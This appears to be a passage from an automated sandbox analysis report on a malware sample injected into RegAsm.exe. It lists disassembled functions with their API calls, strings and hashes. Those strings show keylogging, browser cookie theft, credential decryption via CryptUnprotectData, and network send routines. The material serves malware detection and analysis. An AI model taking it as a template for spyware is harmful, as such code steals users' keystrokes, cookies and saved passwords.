                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                • String ID: XQG$p54$NG
                                                                                • API String ID: 1634807452-455644847
                                                                                • Opcode ID: 1ee6739b3f537898a0ba5199207780b763cd7159a70fbe27a1bff6cd487590cc
                                                                                • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                                • Opcode Fuzzy Hash: 1ee6739b3f537898a0ba5199207780b763cd7159a70fbe27a1bff6cd487590cc
                                                                                • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                                                Function 004434D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                                                • _free.LIBCMT ref: 004435E0
                                                                                • _free.LIBCMT ref: 004435EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$FileModuleName
                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                • API String ID: 2506810119-1068371695
                                                                                • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 10004C1D
                                                                                • _free.LIBCMT ref: 10004CE8
                                                                                • _free.LIBCMT ref: 10004CF2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _free$FileModuleName
                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                • API String ID: 2506810119-1068371695
                                                                                • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63881986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                • String ID: /sort "Visit Time" /stext "$0NG
                                                                                • API String ID: 368326130-3219657780
                                                                                • Opcode ID: ce3dd2a3c922dbd16ff5d7b3e0c03d620dd493b22bab1a3ecf79b0a41218aa7b
                                                                                • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                                • Opcode Fuzzy Hash: ce3dd2a3c922dbd16ff5d7b3e0c03d620dd493b22bab1a3ecf79b0a41218aa7b
                                                                                • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                                Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32 ref: 0041CB68
                                                                                  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                  • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                  • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                • API String ID: 4127273184-3576401099
                                                                                • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                                                • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                                                • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                                                Function 0041631F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 00416330
                                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                                                  • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _wcslen$CloseCreateValue
                                                                                • String ID: !D@$okmode$p54
                                                                                • API String ID: 3411444782-144394840
                                                                                • Opcode ID: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                                • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                                • Opcode Fuzzy Hash: 85a472a8ed9fba8d48a13707545644fa305d45b1f9b2fecff8dfdaf9ddb1d636
                                                                                • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                                Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                                                                Strings
                                                                                • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExistsFilePath
                                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                • API String ID: 1174141254-1980882731
                                                                                • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                                                                Strings
                                                                                • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExistsFilePath
                                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                • API String ID: 1174141254-1980882731
                                                                                • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040A249
                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040A255
                                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread$LocalTimewsprintf
                                                                                • String ID: Offline Keylogger Started
                                                                                • API String ID: 465354869-4114347211
                                                                                • Opcode ID: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                                                                                • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                • Opcode Fuzzy Hash: d2c6c6b1c115abd6082bc8f8898abe3c453afa196391d6f5d8e81b2196ab674b
                                                                                • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                                • String ID: Online Keylogger Started
                                                                                • API String ID: 112202259-1258561607
                                                                                • Opcode ID: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                                                                                • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                • Opcode Fuzzy Hash: f3d6b4abe48f6a11fbf35fca459408289a3e67c664991f394f7c553c248ea070
                                                                                • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: CryptUnprotectData$crypt32
                                                                                • API String ID: 2574300362-2380590389
                                                                                • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                                • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                                Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                                • String ID: Connection Timeout
                                                                                • API String ID: 2055531096-499159329
                                                                                • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                                • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                                Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Exception@8Throw
                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                • API String ID: 2005118841-1866435925
                                                                                • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 0041385A
                                                                                • RegSetValueExW.ADVAPI32 ref: 00413888
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00413893
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateValue
                                                                                • String ID: pth_unenc
                                                                                • API String ID: 1818849710-4028850238
                                                                                • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                • String ID: bad locale name
                                                                                • API String ID: 3628047217-1405518554
                                                                                • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                Function 10004B39 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FreeHandleLibraryModule
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 662261464-1276376045
                                                                                • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                                • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                                • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                                Function 00413656 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                                                • RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                • RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: p54
                                                                                • API String ID: 3677997916-674596673
                                                                                • Opcode ID: cdbe77b62fdb326fa84ed0ef2b451dd3af455626e780c5cb96fc0720a69048d7
                                                                                • Instruction ID: b2ddc0a972744091932d43abea1e646d3cdf78111d27e2b843060007377f7c4f
                                                                                • Opcode Fuzzy Hash: cdbe77b62fdb326fa84ed0ef2b451dd3af455626e780c5cb96fc0720a69048d7
                                                                                • Instruction Fuzzy Hash: B7F04F75600218FBDF209B90DC05FDD7B7CEB04B15F1040A2BA45B5291DB749F949BA8
                                                                                Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                  • Part of subcall function 0041CE2C: AllocConsole.KERNEL32 ref: 0041CE35
                                                                                  • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                  • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                  • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
